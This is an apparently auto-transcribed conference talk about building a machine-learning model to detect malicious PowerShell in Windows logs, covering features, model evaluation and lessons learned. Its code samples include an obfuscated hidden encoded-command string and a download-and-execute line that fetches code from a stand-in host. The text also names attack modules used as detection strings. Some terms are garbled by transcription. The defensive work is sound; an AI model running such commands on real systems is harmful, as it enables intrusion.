
GT - PowerShell Classification: Life, Learning, and Self-Discovery - Derek Thomas

BSides Las Vegas · 46:10 · 88 views · Published 2018-09 · Watch on YouTube ↗
About this talk
PowerShell Classification: Life, Learning, and Self-Discovery - Derek Thomas. Ground Truth, BSidesLV 2018 - Tuscany Hotel - Aug 08, 2018
Transcript [en]

Okay, let's get this party started. So this is an overly dramatic title, really; it's about developing a PowerShell classification model, and the reason it's kind of overly dramatic, the self-discovery part, is that it's my first model, right? So this is the process I went through from start to finish: from observing high-level features and saying, hey, this might work, through that whole process, and also the pitfalls and solutions we came up with along the way. This follows pretty well after Ram's talk and the PowerShell work he mentioned, so that's one of the references I list at the

end; there was an academic paper they put out fairly recently. So this has been our process for the last two years. Who am I? I'm Derek Thomas, an applied security researcher at eSentire; we do managed detection and response. I'm a Converge Detroit conference organizer (just a couple of us around here), so we hold a security conference every year, and I'm a member of the Michigan security community. I consider myself a security data enthusiast; my whole life has involved logs. You're probably saying to yourself, "you've lived a really hard life," and that's probably true. But if you work with logs your whole life, you've got to be pretty good at

doing analysis, or that's a tool that should be picked up. On Twitter you can hit me up at D Time, or on LinkedIn or email if you want to contact me afterward; I'm always open. I have a couple of goals here. I figure the audience is made up of data scientists and security professionals. For the data scientists, I think they'd like to learn about this problem: the strategies for detection, maybe working with subject matter experts on how they see things, how they identify malicious activity, the processes they go through. For the security professionals, this is a concrete ML use case. You see ML all the time as a buzzword; someone says ML, blockchain, AI, and

it's like, what does that actually mean? Well, this is a concrete use case and how we've derived value from it. I also think everyone should start looking at detection a bit differently. A lot of security professionals are very focused on atomic IOCs, very detailed observables, things like that, and I think moving up a level to more generalized detections raises the bar for attackers. And really, everyone can just learn from my experiences: if old Derek had seen this presentation, I would have saved myself a lot of time. So this is our first version of the PowerShell product; it was implemented probably about two years ago,

the process I went through developing a proof of concept. That proof of concept was used to say, hey, this is valuable, we need to operationalize it: spend time and resources to implement a production model doing real-time PowerShell classification across our entire environment. As we go through this, you're going to see some pitfalls; you'll see some things and say, hey, that doesn't really work. So I'm going to cover the pitfalls and the solutions to those problems at the end. Here's the agenda: we're going to talk about PowerShell, the problem, why it's important, how to get the data, and properties of malicious code; then the PowerShell classification in part two, which is really just how I went

through my machine learning process. This all really started back in 2016, which is a while ago, is kind of how I feel. Malicious use of PowerShell started to gain extreme popularity, and that follows through with Ram's slides, 2016 and 2017. This began, as it always does, with a simple request from one of my clients: monitor and alert on malicious PowerShell activity. Following that I'm like, whoa, what does that entail? What is malicious PowerShell activity? Being from the world of logs and SIEMs and things like that, I created use cases, I created rules, hundreds and hundreds of rules; then I bypassed those rules, then I created more rules, and then

I'm thinking, this is insane, there's got to be a better way. That's when it kind of clicked, and it hit us that maybe a classification model, looking at the things that we as analysts look at, would be the way to go. So this is that story. We'll start from the beginning: what is PowerShell? It's a scripting language legitimately used for administrative activity within your environment. Basically, administrators can do anything they want and automate it through PowerShell, which is awesome; it's super flexible. But it's for those same reasons that it's increasingly leveraged by our adversaries, and pen testers, you know, live to compromise

servers and workstations; it's what we call living off the land. PowerShell is available in almost every organization and on every workstation your users are on. Living off the land means using legitimate tools to meet your adversary's objectives: they have the tools available, and they can do almost anything they want once they have access to a system. We dubbed this project Blue Steel, and I'm going to talk about that later; everyone either gets that reference immediately or not, so we'll see who gets it, or maybe they're too scared to say they do. All of this was born out of client requirements for effective detection of malicious PowerShell. Okay, so why is it important? You might say, well, okay, Derek, you can

detect this; why is it important, why should I do this? Well, PowerShell can be leveraged in every stage of the attack. Look at the MITRE ATT&CK framework: they have one tactic reference for PowerShell, which is true, it's for code execution, but with code execution you can perform any step within your kill chain and meet your objectives, from recon all the way to exfiltration and command and control. It has appeared and been crucially used by our adversaries. I'm basing my observations off of the new exploit frameworks that keep coming out; we mentioned a few, PowerSploit, PS>Attack. It seems like every day there's some new tool to fill

a void of offensive capability. Just from going to conferences like this, I've seen an increase in PowerShell talks saying, hey, here's how easy it is to use PowerShell for offensive activities (and defensive ones as well, but I'm more concerned with the offensive). We've observed phishing payloads to our customers significantly; it's been on the rise over the last two years. And then there's increased use in penetration tests. I think penetration testers often rely on PowerShell, and with the Microsoft implementation of logging and script block logging it's going to become more difficult, so I see this being less the case in the future, but right now it's being used drastically. So PowerShell is extremely flexible; it can

be used to hide in plain sight, so you can achieve your objectives: steal creds, or add a user to the domain. One of the cool things (and not-cool things) is that it can execute an encoded command: you can feed it a Base64 string of code and it executes that natively. That makes it tough for me when I'm looking at logs; you see a Base64 blob of text, and is that good or is that bad? I don't know. At first I thought, okay, this is always going to be bad, and in reality, across a large sample size, we see significant use for legitimate

reasons. You see things like Chocolatey or Ansible deploying or doing activities using encoded commands, so I don't really think just flagging encoded commands works. With PowerShell you can also obfuscate and execute code; I'm going to show some samples of this. Basically you can slice and dice, replace, rearrange, compress, or encrypt the data, and then execute that code any way you see fit. And you can use it for fileless attack techniques; we've seen this significantly with advanced attackers: execute code in memory, run a scheduled task and pull the code out of, say, a registry entry, or something along those lines. So, okay, PowerShell is important to monitor; I

hope we're all on the same page there. Well, first you've got to get the data. Like any data science or use-case creation, you've got to have the data. So where does this data reside? PowerShell is very nuanced, which makes it difficult: the data resides in multiple places, and each place has a different amount of data associated with it. PowerShell can be executed in memory, from the command line, or from a script file, and each one logs differently. One of the main sources we use is the Windows security log: it lists the command line straight from the security log, and it's very easy to get; most organizations are collecting these already. You might have

to check to see if you've enabled process monitoring; oftentimes this is already enabled in many organizations. Even better is the PowerShell script block log. PowerShell version 4 or 5 introduced script block logging, which means that any code ever executed by PowerShell is logged and available for analysis. But this is a different log channel than the security log, so sometimes it can be more difficult to get. Enabling script block logging is more difficult by far than enabling the audit settings; I'm going to show you a resource for that, but it's GPO settings: you've got to have the correct Windows Management Framework, you've got to have the correct .NET

settings, and you may not be up to date. Mature organizations can implement this easily; for some it's more of a challenge. Sysmon is another option. If you're not familiar with Sysmon, it's, well, I don't want to call it an EDR agent, but it does significant process monitoring on Windows machines. It's a Sysinternals tool, very popular in the security community; it logs process execution and can be used for getting command lines. And then any EDR solution, like CrowdStrike or Carbon Black, is doing significant process monitoring; oftentimes they have logs that can come out of that, or you can query them and say, hey, show me

all the PowerShell commands and command lines. So here's an example, and I'm going to try to outline the nuance of collecting these logs. From a command line I'm executing an encoded command: powershell.exe with -EncodedCommand and then just a blob of text. That's what we would see if we're monitoring these logs, and that can be difficult, but in reality this is just showing $PSVersionTable; it's showing the version of PowerShell. I'm going to show you what this looks like in the actual log. Here's the Windows security log, event 4688; you can see at the bottom it shows the encoded command. What I'm really

concerned with here is the process command line at the very bottom. This is a newer feature from Microsoft; you have to enable it through GPO, and I suggest everyone does. There's so much more value there, and it's easy to extract the command lines from it; I'll show you a reference for doing that in a bit. The important thing to note is that basically exactly what was typed at the command line is what shows up down there. Here's a Microsoft script block log, and you'll notice that in the script block you see the actual code that was executed. That was the Base64 encoded command, right, that shows you the

version. So this gives you, if you're not seeing it already, so much more value, because you can see the decoded commands. That's a step you can then skip in your monitoring solution: identifying the encoded command and then decoding the Base64 blob. That might seem easy, but it's difficult, because PowerShell has aliases and is very flexible: -e, -ec, -EncodedCommand, etc.; there are a lot of ways to do this. So this will show the encoded command, and really we use this for identifying legitimate uses of encoded commands, because we'll see a ton of obfuscated

commands that cannot be decoded automatically if we haven't seen them before, but where you've never seen a legitimate use of that pattern yet. So here are the references for enabling command-line process auditing and enabling script block logging. I definitely recommend the second link, "PowerShell ♥ the Blue Team"; that blog post from Lee Holmes, I think in 2015, is what got me into really looking at PowerShell, thinking this is important, and looking at some of the features Microsoft was implementing at the time. It was a little difficult for many organizations to transition to script block logging and implement some of these features back then, but now it should be

much more doable. So we've enabled them, we're collecting logs on the workstation or server; how do we get them for analysis? Really, if you have a SIEM, your preferred SIEM vendor should be able to help with this, but I'm going to go through a built-in function I want people to know about that's easy to use: Windows Event Forwarding. Through GPO you configure the forwarding of PowerShell logs from the workstations to a central collector. At the central collector you can install an agent like NXLog and say, hey, send all of these events from the Forwarded Events store to a syslog server, to a database, really to anything you want. So

that's just one way to get them for analysis, but if you have a SIEM, it most likely can collect the operational script block logs and Windows security logs from the endpoints. Okay, so: analyzing the PowerShell data. I spent so much time trying to create rules for detecting malicious PowerShell, only to realize that I didn't think it was going to work. So, you know, I sat in the corner and cried for a little bit, then I got up and said, okay, let's figure out how we're going to do this. Two major takeaways from that: many, most, samples were obfuscated, but even when they were obfuscated, after you've

reviewed hundreds and hundreds of logs, they stick out like a sore thumb: no programmer in their right mind would write code like that, and if they do, they're messing with somebody. I have yet to see a legitimate use of obfuscated code. And if they weren't obfuscated, they were frequently using strings known to be suspicious or malicious. Basically, if I look at a suspicious event, almost immediately I can tell it's doing some shady stuff, and I don't even program in PowerShell; I'm a threat analyst, I create use cases, things like that. So it's pretty straightforward to understand, at least

in my opinion, after you've looked at some samples and studied this a little, what's bad and what's good. So we started identifying high-level features that seem to indicate malicious code: if you can look at it and understand that it's malicious, why is that? We started asking ourselves why this looks malicious, and here are all the reasons, so I'm going to go through them. The first one really is the quantity of known suspicious or malicious modules. Immediately when you look at something (this is taken from a real malware sample, deployed through a Word doc and executed) it has references to Invoke-Shellcode, PowerSploit,

Meterpreter, persistence... really, if you see anything like that, it's a red flag; immediately you know something's going on. Hopefully it's a pen test, and if it's not, you start digging in. You see a high quantity of these in the events being executed. We noticed, too, a lot of evasion tactics, like strange capitalization: it appeared the code would be randomly uppercase or lowercase, and most code is not going to do that. So how would you identify that? Well, most of your code has a known ratio of uppercase to lowercase, based on first letters and things like that, and when you have two times the

uppercase, or an equal amount of uppercase to lowercase, that's pretty significant. Then obfuscation and encoding. This really covers any custom way an adversary might try to hide their code: they can slice it, dice it, rearrange it, replace it, put it back together, compress it, or encode it, anything. There's a great framework called Invoke-Obfuscation that can take your nice $PSVersionTable, a ten-ish-character command, and make it into a 1,000-character command-line argument that's illegible to any human and encoded in multiple different ways, yet it can still be executed. What this does is obscure the code from automated analysis: logs are going into your SIEM and you're

looking for code, and you're looking for specific strings; like, I'm going to look for Meterpreter or Invoke-Shellcode, or maybe you've got an awesome list, but this is going to bypass that. Then we saw in a lot of malware samples a high ratio of special characters. You look at this and I don't think it's recognizable PowerShell to anybody; I hope not. It just looks ridiculous, and why does it look ridiculous? It has so many special characters. So we figured that would be a good one to look at. And finally, the cosine similarity. There's a great blog post referenced here from Lee Holmes, where cosine similarity basically asks: does this

event look like known-good events? If we have a set of known-good labeled data, we can take that event and score it based on how similar it is to those. Here's an example of just taking two events and scoring them: you see that the top one, an event from a good log source compared to another good log source, scores pretty high, while the cosine similarity of a good log source to a malicious log source is very low. What we do is take our set of labeled known-good and compare it to the known-bad event that we're examining at that moment.
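As a minimal sketch of the idea: one common way to set this up (the talk doesn't show its exact implementation, and the sample command lines below are made up for illustration) is to treat each command line as a bag of characters and compare the two frequency vectors:

```python
import math
from collections import Counter

def char_cosine_similarity(a: str, b: str) -> float:
    """Cosine similarity between character-frequency vectors of two strings.

    1.0 means identical character distributions; values near 0 mean the
    strings share almost no characters in common.
    """
    fa, fb = Counter(a.lower()), Counter(b.lower())
    dot = sum(fa[ch] * fb[ch] for ch in fa.keys() & fb.keys())
    na = math.sqrt(sum(v * v for v in fa.values()))
    nb = math.sqrt(sum(v * v for v in fb.values()))
    return dot / (na * nb) if na and nb else 0.0

good = "Get-Process | Sort-Object CPU -Descending"
bad = "$e='JAB...';PoWeRsHeLl -NoP -W Hidden -EnC $e"

print(char_cosine_similarity(good, good))  # identical distributions, scores ~1.0
print(char_cosine_similarity(good, bad))   # obfuscated sample scores much lower
```

Scoring a new event then reduces to something like taking its maximum (or average) similarity against the labeled known-good set.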

And just knowing that, it's pretty easy to implement in Python or R; it's just a function you can use to derive your features. So we've outlined a lot of high-level features. These are the things our analysts are looking at, and what they're using to judge how suspicious an event is. Now we get to why machine learning, and how to classify this and train a model. As I learned, there's a never-ending cycle of creating rules to detect bad behavior, then detecting the bypasses, then the bypass of the bypass, and on forever. So we have a better

way with those features. We had identified the high-level features, and those would be tougher to bypass than just string matching and things like that. And honestly, as a data enthusiast, I wanted to work on a problem that wasn't classifying flowers, right? I've gone through some classes, and you see the same stuff on the internet, and I'm like, okay, this directly applies to me, and I think we can do this; so it was a lot more fun. My machine learning is really self-taught: I'm not a programmer, I'm not a data engineer or a machine learning expert. I've studied Coursera courses for the last probably

three or four years and just tried to learn, because I think it's a tool that any data analyst or security threat analyst should pick up. This is where I think it's going: adversaries are making their behavior fit in with normal activity, and that's getting tougher and tougher to identify. Everything I did early on was in R, but I built this in scikit-learn, just because it transfers better to my team; a lot of people work better with Python, I was the only one who wanted to work in R, and scikit-learn has great documentation. Since I had learned the frameworks in R using the caret package, looking at this I was

able to do this pretty quickly. The raw events came from both Windows security logs and the Windows script block log. We had samples from people who were friendly and said, hey Derek, I'm interested in what you're doing, here's a whole ton of data; we even generated some malicious samples for you, here you go. So we took those, collected them, and then we needed to put them into a form suitable for learning. If you look at this, it's really free text, right? Free text in this case isn't going to work too well in our learning algorithm, so we needed to transform it into a form that would be

suitable. So we reviewed: my partner and I locked ourselves in a room for probably months on end, classifying. I think initially we had thousands and thousands of known-good and known-bad events; we also generated adversary samples and collected from our phishing campaigns, things like that. We really just begged, borrowed, and stole as many samples as we could. Well, we didn't steal anything, it was all legit; I have to say that. For each event we create a vector of values: first the ratio of uppercase to lowercase, like I mentioned; special characters to total characters; alphabetic characters to total characters; the cosine similarity; the

count of suspicious modules; and the count of malicious modules. Now keep in mind, this is what we used at first; it's not what we use now, and we'll go into the details, but the first list did work pretty well. So here's a sample event, some command obfuscated with Invoke-Obfuscation. We create functions to derive each one of those values; those are the values there, and basically it's comma-separated, like a CSV file full of labeled data. Yes, so, the events that we got: when we store the events, they're stored in raw text. We collect them, and we definitely are not storing them in XML, so

we've collected them through a process similar to what I showed earlier: you have the log sources, they're collected at a central location, and NXLog transmits them as text, so it's not XML or any other format, just plain text that we process. Essentially we extract the last field, the process command line; it's formatted almost exactly the same, with the formatting characters. So here's an example of how we derive the values and what each record looks like; it's just a CSV file when you think about it, and it ends up looking like this. If you're familiar with machine learning and you see a file like this, you're like,

okay, all the hard part has really been done at this point. There are some issues with this data, but it's there and it's usable, so it's time to start evaluating algorithms. There are so many; when I look at scikit-learn there are so many algorithms, and I'm not a data scientist, so I'm not sure which ones will work best. What I found was: I'll just try all of the ones in there. I found some good sources for creating a test harness to iterate through each one and compute the accuracy; I won't really go through that, but these were the initial ones; we had more, like an MLP classifier.
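A spot-check harness in that spirit, sketched here with scikit-learn on a synthetic imbalanced dataset (the model list and data are illustrative stand-ins, not the talk's actual feature set or pipeline), can be as short as:

```python
from sklearn.datasets import make_classification
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import cross_val_score
from sklearn.neighbors import KNeighborsClassifier
from sklearn.tree import DecisionTreeClassifier

# Stand-in for the labeled feature vectors: mostly benign, few malicious.
X, y = make_classification(n_samples=1000, n_features=6,
                           weights=[0.93], random_state=0)

models = {
    "LR": LogisticRegression(max_iter=1000),
    "KNN": KNeighborsClassifier(),
    "CART": DecisionTreeClassifier(random_state=0),
    "RF": RandomForestClassifier(random_state=0),
}

results = {}
for name, model in models.items():
    # 5-fold cross-validation: train on 4 folds, score on the held-out fold.
    scores = cross_val_score(model, X, y, cv=5, scoring="accuracy")
    results[name] = scores
    print(f"{name}: mean={scores.mean():.3f} std={scores.std():.3f}")
```

On a 93/7 class split like this one, swapping `scoring="accuracy"` for `scoring="f1"` gives a much more honest comparison, for exactly the reasons discussed in this talk.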

So we ended up looking at other ones in addition to these, but they all performed very similarly. We used k-fold validation: we took our data set, which includes known-good and known-bad samples, and divided it up, like 80/20; that 80% was our training set and the 20% was our validation set, and the 80% is what we used to train the algorithms. This is the process of how we trained. K-fold validation says: hey, we're going to split the data up K times, in this case five, and we're going to iterate through that, training on four pieces of the data and testing

the accuracy, our test metrics, on the fifth piece of data; then we iterate through each piece, so all the data has been trained on and all the data has been tested. We did ten splits, tenfold, but in this example it's five; either way it worked pretty well. We scored with accuracy, and our accuracy was off the charts; I'm like, okay, 99.7%, I'm done, here you go, guys. Really, that was pretty good, but there were issues with it. Here are the distributions of the different algorithms and how they worked out: you see random forest, logistic regression, k-NN, and CART worked pretty well, and there were some others that did not work

very well; I'm going to talk about why those didn't work well at the end, though you may be seeing it already. But anyway, I saw there were four that worked approximately the same. Each time I ran through, the results would change slightly; that's one thing to keep in mind with machine learning algorithms: you won't get the same results every single time, you'll get slightly different accuracies and metrics on each run. So okay, accuracy is 99.7%, but my data set is highly imbalanced (we'll talk about that issue later), so even if I were to guess benign every single time, I would have something like 93% accuracy, which

sounds good, but in reality is the worst you could possibly do. So we need to look at other metrics, like precision and recall. These two metrics are what we're interested in, because we want a good balance of catching everything without sending false positives to our SOC too often. Precision: what percentage of suspicious classifications are truly suspicious? If I classify a hundred samples as malicious, what percentage of those are actually malicious? Recall is a little different: what percentage of truly suspicious events were classified as suspicious? Say there are 150 truly suspicious events; what percentage of those were classified as such? So it's a

slight difference; it took my head a while to wrap around it, but Wikipedia has the classic picture of precision and recall, and I suggest taking a look at that. Anyway, we ended up using the F1 score. Here's the precision: for random forest it's pretty high, 98%; what percentage of our classifications were truly suspicious? 98%. For recall, what percentage of our truly suspicious events were classified as suspicious? 96%. That was pretty good, and the F1 metric we ended up using came out to 97% for random forest. We were pretty happy with this; it's significantly better than our

rule-based approach, which was triggering thousands of false positives to our SOC and missing some known things we thought it should be catching, things we ended up catching through other means, detection through other products, etc. What we're interested in is a good balance: we can't send too many false positives to the SOC, and we want to catch everything. How do you show that? Through the ROC curve; I think this is obligatory for any machine learning model. This ROC curve looks ridiculous; keep in mind it's based on one customer's worth of data from when I created it, so without an extremely varied set you're going to get a really good-looking

ROC curve. But what it shows is that we're way better than luck, so we're doing pretty well here. We ended up with the random forest algorithm; it was the most accurate in testing at the time, and we ran it for a long time against all of our data. The algorithm needs to be tested against previously unseen data: we were training and testing on the same set, so now I'm going to give it that 20% I set aside, run the model, and say, hey, how does it do on previously unseen data? It's very important, if you're not familiar with machine learning, that you don't train on the data

you're validating on; that's like memorizing version one of a test and then being given version two, and you're like, aw crap, none of this is the same. So we trained the model and tested the accuracy on the validation set: extremely high. You see that on this test we had roughly 1,800 samples, 99.8% accuracy, and the F1 scores were really good as well. We thought this was really good; at this point, when I show this, it's where I'm trying to justify putting additional resources in: get more data, talk to more clients, build the pipeline, and say, hey, we want to apply this

to everybody. So: random forest with the highest accuracy; we used it for a while, very successfully. What it shows is that we reduced false positives significantly. Our SOC had been looking at every instance of encoded commands, which are used quite often for legitimate purposes, so they would have to decode the encoded command, take a look, and make a judgment call; that's time-consuming and a waste, and it ends up being something like one percent of encoded commands that are actually malicious. We also increased our true positives, so things that were being missed before are not missed now. When we detect that malicious PowerShell actually caused a service to run, that service running is

what triggered, say, a Carbon Black watchlist rule, and we'd think, wow, we should have seen that PowerShell event earlier; why didn't we? Now we're seeing those. I mean, we decreased false negatives, and we can show this because we ran in parallel with our existing rules, so we could see the things they missed that we would never have known about if it weren't for this. We also tested on sandbox events: we get tons of phishing documents, we detonate them in a Cuckoo sandbox, we get the logs and analyze them. If we see a PowerShell sample from a Cuckoo sandbox, it should most likely be malicious, and someone reviews every single one of those. So that kind

of helps us say, hey, okay, this thing's working well; and that's it! No, I'm just kidding. If you look through here, pitfalls and lessons learned: this is the gold, right? This is the advice that, if I had seen it back then, I would have been happy with. That was the end of the PoC part of the story; it was probably done early-to-mid 2017. We learned a lot of lessons and we've enhanced this model significantly, so I'll go through some of those enhancements and talk about some of the problems. Obviously I can't talk about the exact specifics of the pipeline we're running for our

clients, but I think these are the lessons we derived it from, so it's really worth its weight in gold in ML. One of the biggest questions I get: how do you account for overfitting, how do you do feature engineering? Our data was pretty good: we had a lot of samples, we generated malicious samples, we got them from sandbox events, we got them from clients, and we took care to keep our training set and validation set separate. But one of the issues is that these are really hand-engineered predictors, right? We created them; we decide what's

suspicious, we decide what's malicious; it requires our judgment. Also, each of those malicious and suspicious samples is not as malicious as the others, right? You have suspicious strings: you see Invoke-Expression often in malicious samples, but also in legitimate samples. At first I thought these were always malicious; that's not the case at all. So how do we fix that? We already paid really close attention to separating our training and validation sets; what we did here was update our feature engineering to address the issue. We ended up drastically increasing our feature set (I can't go too much into this), but basically we stopped using

the suspicious of malicious count list it worked pretty well but and better than our rule set but it did not work as well as we needed it to so I kind of it's about as far as I can go there and if you think about it if I'm creating a list of suspicious and malicious modules that's from my experience reviewing these logs and so even though I split the training and validation set I essentially looked at the validation set and generated this list of suspicious events from that set and now I'm creating a true training the model on that so really that's kind of overfitting to that data and we kind of learned that afterwards when we saw when

we introduced more data you start seeing things like calm and common modules used at one client that are not used at the other you know like oh this is actually use I can't believe that like encode a command and VOC expression so that should help if you're working on this there's also some references at the end the bad data so I found that certain algorithms prefer normalized event data's rather or event data rather than the raw number so if you saw we had specific counts like 16 and then we would have the cosine similarity be 0.05 those are those are not normalized or standardized in any way and a lot of algorithms require that so basically after when I was looking to

research this standardizing normalizing those events are really good for any algorithm to work so now everything's a number between 0 & 1 you take all those suspicious counts and you convert them into you know less numbers between 0 & 1 like I said and this is probably the reason for the really poor performance and some of those algorithms that was showing earlier in the distribution we didn't go back because random force worked really well still even when I normalized data so and we can really increase we'd spend a lot of time and create increasing the accuracy for very little gain so here in psyche learning you have the the normalizer and standard scaler you can look that up basically we

supply that to the data set and then train and predict based on that data here's some links for that if you're interested and I really just suggest look at the site killer and especially if you're new it walks you through everything and really make sure the data fits your algorithms like you know I'm kind of blindly saying normalizing data is best there may be some edge cases where that's not true I'm not sure but it's worked well for us probably the biggest one in any machine learning data science problem not enough data lack of diverse data I'm in a decent position not as good as Microsoft is but we have quite a bit of data so we're able to you

know each model makes the predictions based on what we've previously seen so of course you want to see as much as possible not enough data and and really need diverse data so like I had a good quantity from one client when we introduced other clients they do things differently they what's normal to them is not normal to others so we're able to kind of differentiate that learn those features and apply that to everybody and really the way to do this get more data beg borrow steal don't steal it generate additional data walk with a PowerShell there's lots of ways to do this there's like I said there's those PowerShell frameworks to do bad stuff that you don't need to know

PowerShell that well I'm pretty familiar with adversary techniques and in tactics so I'm able to kind of run this in in a virtual environment generate the data that we want without much of an issue but uh it's it's not that difficult also if you get phishing samples you can take a look at that so also even just looking at Twitter we literally saw samples on Twitter so they were pretty interesting oh one other thing would be label label label make the labeling as easy as possible when we had a system where it was difficult you know I'm literally copying these features from one file into another and combining them that sucks if you have a system where you can

review the event I see the prediction and classify the event that's that's great and then use that for subsequent training of training from the beginning measure your performance so I'm a security guy I'm not a data science guy I didn't measure hardly anything at first probably nothing I just saw all this classified most everything pretty well then I start getting questions asked like well what's the false negative rate what's the false positive rate show me a confusion matrix show me a rack curve show me all these things and I started learning that as I went through from the beginning make sure you can measure that and we're still working on that a little bit I'm just have good

measurements to say okay this is operating well because you know one of the questions I get allows concepts what are we classifying now as much as that we may not have generated classified back then that's hard to understand and we take a look at that through kind of QA type activities when we see things that are being classified from a from a sandbox we take a look at that if it's not if it's classified benign and we need to understand why it was classified as benign so it's easy to avoid collecting metrics want this probably if you don't if you take one thing away your ability to describe the value of the model is as

creative as as critical as the value of classifying the events because if you cannot describe the value of this to people that are going to give you time and resources then it's never going to be implemented this has to be done and has to be able to show that this will provide value and I'll show you how how I did that so for our use case up precision recall far more important than accuracy we had a highly unbalanced set one thing I learned from this count conference was that you know used if I'd known about smoke back then for for compensating for the imbalance data set that probably that may have helped a little bit we

didn't really have that much issues though in terms of our precision and recall being affected by this though so I'm not sure how much of an imbalance data set causes problems in this case measure everything from the start make sure the value is easy to convey on this last one code names tend to stick around so from the beginning we did not know if this was ever gonna work it was kind of a pie in the sky activity my partner said hey let's call it a project blue steel it sounds cool it's one from one of the best movies known you know probably next to Casablanca so if you haven't seen it go check it out you'll

be overwhelmed I'm sure so obscure references are obscure not everyone has seen Zoolander so that's I learned this one the hard way because blue steel just kind of sounds cool if you've never seen about it right it's like steel it's blue you know but now it stuck around though and you know you may see it if you take a look out there but so here's how really how I communicated the results we took a look at our detection efficacy I had we had an increase in 28% true positive rate so we're catching more stuff with this our false positive reduction was decreased by 99% and that's because we're able to we're not investigating every single instance of a

coat of command and every single instance of invoke invoke expression and we see that a lot especially where people are orchestrating updates and things like that that alone showed said hey this reduces time saves money reduces analyst load which time is money right and in the case of a sock and so we're like okay let's let's move on this so that was kind of the end of the POC at that point we moved on it we went to production eyes there we input we implemented collecting metrics at first like on my POC is a batch processing Ram I'm just classifying a whole batch of events we're not doing this in real time now we've got a real-time pipeline where

we're taking a look at a large scale pretty much all of our clients data and pushing it through this so we've got so much value from what ends up to be far to me I think being far less work than creating rules constantly updating those rules constantly whitelisting those rules constantly creating new ones trying to bypass rules things like that so we were quickly able to iterate and generate or both robust model it was easily updated so we update with new samples constantly we had a training you know a way to train the data efficiently and we constantly monitor for false positives and false negatives right so we we obviously take a look at any false

positives that come or any all the motion samples anything classify as much as being looked at anything that's being generated from a sandbox that's classified benign is being looked at so I mean it's impossible say I'm looking at all false negatives obviously it's one of the hardest things you can do but we're doing a pretty good job there and with this we're raising the bar significantly for for our detection so it's it's far more difficult to evade this then change the capitalization on your on your script to bypass some case sensitive rule that's in place and improved analyst efficiency so that's really what this was all about and so that's about it there's a merging work

in this area so detecting malicious PowerShell commands using deep neural networks was a was a reference paper recently released or academic paper recently released I'm not sure if that was the one that Ram had referenced but it looked like it could have been revoked confiscation is one that were they were they're using kind of machine learning techniques to detect a few skated code and then also firewall far I recently released a blog post those similar detection mechanisms so if you're interested in this subject take a look at those they all do differ one of us do things a little bit differently every one of us has had pretty good results and we've operationalize this for really two years and it's been we've

cut we've caught a nation-state attackers pentesters really highly advanced threats across many locations so probably the best work I've personally implemented so gives more resources right so I have the data set and Jupiter notebook online if you want to go through and kind of just be kind you know like I said I'm not a programmer or a data scientist but that's kind of a walk through that you could take a look at and do yourself the data set does not include PowerShell code because I can't show that it's usually specific to the organization you might even have passwords or user names in that in some cases we do our best to remove that info confiscation revoke obfuscation from

Daniel Bohannon I hope I'm pologize if I got that incorrect really that's how to generate adversarial samples and how to detect office created samples if you want to Palo Alto has a ton of encoded commands thousands and thousands and thousands so if you want to take a look some samples see the the plea home says the blog post like cosine similarity that's kind of what got me down this row when you see this that was hard to do using that cosine similarity text ops K code very well and then machine learning mastery process for working through machine learning problems a very wise man showed me the this process here so how you could go through from training

testing showing metrics things like that and this is a good way to do it so that's about it do we have any questions
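The cosine-similarity approach mentioned in the resources above (comparing a script's character-frequency profile against typical PowerShell) can be sketched in a few lines. The sample scripts below are invented for illustration, not from the speaker's data set:

```python
import math
from collections import Counter

def char_freq(text):
    """Character-frequency vector for a script (case-folded)."""
    return Counter(text.lower())

def cosine_similarity(a, b):
    """Cosine similarity between two sparse frequency vectors."""
    dot = sum(a[k] * b.get(k, 0) for k in a)
    norm_a = math.sqrt(sum(v * v for v in a.values()))
    norm_b = math.sqrt(sum(v * v for v in b.values()))
    return dot / (norm_a * norm_b) if norm_a and norm_b else 0.0

# Toy baseline of normal-looking PowerShell versus an obfuscated one-liner.
baseline = char_freq("get-process | where-object { $_.cpu -gt 100 } | sort-object cpu")
normal = char_freq("get-service | where-object { $_.status -eq 'running' }")
obfuscated = char_freq("iex([char[]](105,101,120)-join'')('$x='+[string]0x41)")

sim_normal = cosine_similarity(baseline, normal)
sim_obfuscated = cosine_similarity(baseline, obfuscated)
# Obfuscated code tends to diverge from the baseline character distribution,
# so its similarity score comes out lower than normal admin activity.
```

A single threshold on such a score is exactly the kind of hand-tuned heuristic the talk moved away from; in practice the similarity would be one feature among many fed to the classifier.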

The things you were classifying: were they an overall PowerShell script, a line of code, or an individual execution within a line? They were either of two things. One would be from the command line, just the PowerShell command-line process, so the binary and then all the arguments that were provided; that's one of them, it's an event and we're pulling one field from it. The second would be the script block log. If you were to execute, let's say, "powershell.exe dobadstuff.ps1", you wouldn't be able to tell that's malicious through classification, but the code that's executed from it is stored in the logs. They divide those up; there's a limit, something like a thousand characters, and they'll divide the blocks up, and we take a look at those as well.
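The script-block splitting described in that answer implies a reassembly step before analysis. A minimal sketch, assuming fragments shaped like Windows PowerShell script block log events (event ID 4104 carries a ScriptBlockId plus a MessageNumber position); the exact event shape is an assumption to adapt to your own pipeline:

```python
from collections import defaultdict

def reassemble_script_blocks(events):
    """Stitch PowerShell script block log fragments back into full scripts.

    Long script blocks are logged in numbered pieces; each piece shares a
    ScriptBlockId and carries its 1-based position as MessageNumber.
    """
    fragments = defaultdict(dict)
    for ev in events:
        fragments[ev["ScriptBlockId"]][ev["MessageNumber"]] = ev["ScriptBlockText"]
    # Concatenate each block's fragments in MessageNumber order.
    return {block_id: "".join(parts[n] for n in sorted(parts))
            for block_id, parts in fragments.items()}

# Hypothetical fragments, arriving out of order as log events often do.
events = [
    {"ScriptBlockId": "b1", "MessageNumber": 2,
     "ScriptBlockText": "DownloadString('http://example.test/p')"},
    {"ScriptBlockId": "b1", "MessageNumber": 1,
     "ScriptBlockText": "IEX (New-Object Net.WebClient)."},
]
blocks = reassemble_script_blocks(events)
```

Whether to classify individual fragments or the reassembled script is the design choice discussed again at the end of the Q&A.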

